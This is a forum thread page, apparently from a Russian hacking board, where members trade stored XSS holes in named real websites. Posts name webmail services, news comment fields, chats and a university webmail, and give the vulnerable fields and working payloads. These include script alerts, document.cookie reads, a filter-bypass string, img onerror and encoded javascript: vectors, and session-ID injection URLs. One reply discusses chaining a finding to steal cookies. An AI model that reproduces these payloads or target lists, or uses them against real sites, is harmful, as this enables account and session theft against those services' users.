Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. scrat

    scrat кодер

    Joined:
    8 Apr 2007
    Messages:
    625
    Likes Received:
    541
    Reputations:
    3
    moskva.ru - ставим имя
    заходим в поиск по интересам и вуаля алерт сработал :) чувствую там ещё много багов будет :)
     
    2 people like this.
  2. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    http://vip-file.com
    Заливаем .html файл с ксской ..
    Пример: http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html

    ---------
    Жаль, что ток у мну пашет ( -deleted-
     
    #202 BlackSun, 11 Jul 2008
    Last edited: 11 Jul 2008
    2 people like this.
  3. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    20minut.ua PR 4
    активка - сам очень удивился после того как ввел это в строку... после чего зашев на 20minut.ua я увидел свой алерт )
     
    #203 sabe, 13 Jul 2008
    Last edited: 13 Jul 2008
    1 person likes this.
  4. -=Static=-

    -=Static=- Banned

    Joined:
    12 Nov 2006
    Messages:
    201
    Likes Received:
    40
    Reputations:
    0
    _http://www.e-xoopport.it/modules/news/

    Активная XSS в системе комментариев, в теле сообщения!) Не фильтруется вообще ничего)
     
  5. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    NextMail.ru

    Активная ксс, старенькая, но ужось, все еще пашет :D

    Шлем письмо ..
     
    1 person likes this.
  6. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    http://novy.tv/services/chat/
    Чат "Нового Канала"

    Если кто узнает движок, сообщите плз, такой же у прова стоит...

    Регаемся, заходим (visto:visto)

    Слева, там где Интонация, выбираем "настройка", добавляем свой вариант -
    В меню --- записная книжка --- добавляем запись:

    Ну вообщем может кому пригодится..
    и еще фича: если написать в чате сообщение !b blabla !
    то текст blabla беоеться в теги
     
    2 people like this.
  7. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    iol.pt
    Активная XSS в почте,
    Идем в яшик ( http://webmail.iol.pt/horde/dimp/#folder:INBOX )
    Шлем письмо,
    Para: - кому,
    Assunto: - ксс - <script>alert()</script><noscript>

    // BlackSun
     
    1 person likes this.
  8. Frozzeg

    Frozzeg New Member

    Joined:
    20 Jul 2008
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    krasnodar2000.ru

    Активная XSS в комментах новостей
    Уязвимые поля "Ваше имя", "Город"
     
    1 person likes this.
  9. Frozzeg

    Frozzeg New Member

    Joined:
    20 Jul 2008
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    nevasport.ru


    Активная XSS в комментах новостей
    Уязвимое поле "Ваше имя"
     
  10. Frozzeg

    Frozzeg New Member

    Joined:
    20 Jul 2008
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    seonews.ru

    Активная XSS в комментах новостей
    Уязвимое поле "Имя"
     
    #210 Frozzeg, 5 Aug 2008
    Last edited: 5 Aug 2008
  11. Bonnie and Clyde

    Bonnie and Clyde New Member

    Joined:
    26 Jul 2008
    Messages:
    7
    Likes Received:
    4
    Reputations:
    2
    Активная XSS в бесплатной почтовой системе NextMail.ru

    @nextmail.ru
    @nxt.ru
    @epage.ru
    @email.su
    @student.su
    @hu2.ru
    @xaker.ru
    @mail2k.ru
    @dezigner.ru
    @programist.ru
    @onlymail.ru
    @logmail.ru

    Отправляем письмо адресату с прикрепленным файлом, в прикрепленном файле пишем код.
    (прим.: <script>alert(document.coocke);</script>)

    XSS работает только(!) в IE (по крайней мере у меня в Опере и Мозилле не сработало)
     
  12. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Bonnie and Clyde, работает и в ие, и в опере, и в фф:
    https://forum.antichat.ru/showpost.php?p=779537&postcount=229
     
  13. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-send.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-advsearch.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-folder.pl?action=editfolders&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-prefs.pl?action=editprefs&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-abook.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-main.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-read.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-cal.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-webdisk.pl?action=showdir&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
     
    3 people like this.
  14. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    Блог:
    http://blogspot.com/

    пример первой попавшейся xss. при создании своего блога вписываем алер и:
    http://1111vvv.blogspot.com/
     
  15. NFM

    NFM Reservists Of Antichat

    Joined:
    16 Jan 2006
    Messages:
    308
    Likes Received:
    191
    Reputations:
    22
    от нее смысла нету. куки она не передает так как куки идут с блогера. только если связку ставить или редирект
     
  16. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://mymail-in.net/
    срабатывает 11 XSS в теле письма. проверено с помощью "SMTP XSS Tester v1.0"
    // Наверное это можно считать за активную xss?
     
  17. echobyte

    echobyte Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    463
    Likes Received:
    190
    Reputations:
    50
    http://nexile.ru/href/5713.html

    В обьявлениях фильтруется script
    соответственно "><scr<script>ipt>alert()</scr</script>ipt>
     
  18. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    Сервер: mail.km.ru
    зарегал мыло на http://bossmail.ru/
    создаем письмо, вписываем в него алерты с таким телом письма:
    Code:
    <body>
    <img src="a"onError=alert(121)>
    <img src='a'onError=alert(122)>
    <img src=javascript&#13:alert(79)>
    <img src=javascript&#10:alert(68)>
    <img src=javascript&#9:alert(57)>
    <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert(46)>
    <img src=javascript:alert(16)>
    </body>
    открываем письмо у себя в папке или отправляем его с небольшими изменениями ; )
     
    #218 Calcutta, 14 Aug 2008
    Last edited: 15 Aug 2008
  19. echobyte

    echobyte Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    463
    Likes Received:
    190
    Reputations:
    50
    http://fotocelebrity.net/anna-seminovich/anna-seminovich27.php
     
  20. NApoleonchik

    NApoleonchik Elder - Старейшина

    Joined:
    4 Jul 2007
    Messages:
    79
    Likes Received:
    39
    Reputations:
    4
    xss

    PR 2
    тИЦ 10


    http://www.auto-magnitola.ru/forum/index.php

    Уязвимы все поля в форуме. Ничего не фильтруется

    ))
     
    #220 NApoleonchik, 15 Aug 2008
    Last edited: 15 Aug 2008